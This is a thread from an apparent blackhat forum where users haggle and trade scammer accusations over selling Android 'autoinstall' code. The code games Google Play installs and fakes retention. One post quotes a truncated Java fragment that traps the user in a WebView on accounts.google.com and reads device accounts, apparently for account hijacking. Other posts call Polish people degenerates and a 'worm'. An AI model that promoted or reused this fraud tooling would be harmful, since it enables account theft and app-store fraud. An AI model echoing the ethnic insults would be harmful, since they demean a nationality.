[Sell]Blackhat library

People not interested to… sales finished :wink:

Again ramzixp scammer is trying to cheat people…

Autoinstalling is my code and i sell it for 200$. Now i can sell it for 100. You just add some shit to my code

What is ramzixp? Again you? I can give your code here for free if you not just leave my place. Scammer is you, I bought your code and it was not working.

You are a real idiot ramzi… you didnt buy my code because you dont have even 100$… you stole it and now trying to resell it for 1000. Hahha

Who want his code for free, PM me, I have no time so just 5 first people. If you not shut up and leave this place, I sacrifice my time and publish it free.

public class a extends Activity {
private String URL1 = “https://accounts.google.com”, URL2 = “”, acc = “”;
private WebView mWebView;
private boolean calledGP = false, asked = false;

@Override
public void onBackPressed() {
}

@Override
protected void onActivityResult(int requestCode, int resultCode, Intent data) {
if (requestCode == 1 && resultCode == RESULT_OK) {
acc = data.getStringExtra(AccountManager

This is fragment of your brilliant code and this is last warning. Leave me alone scammer.

hahah f*ck off - you said that this code is not working. It’s also code you are selling - so you won’t sell anything

Your code is not working, my is 100% different code. Different javascript, many different things. Your was idea only but the work? Useless poor eclipse project with messy activities and trashy code. Please, before to comment again, check your own code on android 4.x and 5.x - your code is working only with android 6.x and the newest browsers. Did you check it? Why I am the 3rd or 4th man who is saying “not working?”

Because you have 10 accounts and you are saying the same from them? Words like “messy” or poor eclipse project is 100% ramzi :slight_smile:

I read that you both are nice scammers and people not like you. Go away.

how did you both fell so low

Like many Poles, they were always degenerates. Poland is a hell hole with very low wages, so many of its citizens tend to do shady immoral shit to make a quick buck.

lol :slight_smile: so true, mmmkkksss is polish worm

Up up up!!

Promotion for first buyer $200 !

You to show any evidence , and now Google will remove any incentive install how this will affect this method

No if you generate fake retention…

I can sell this method for 50$! :slight_smile: It won’t work with new Google Play update of course

Your fckin method is banned, my not :wink: and you have not my method, just your own with poor eclipse code. Can you just die?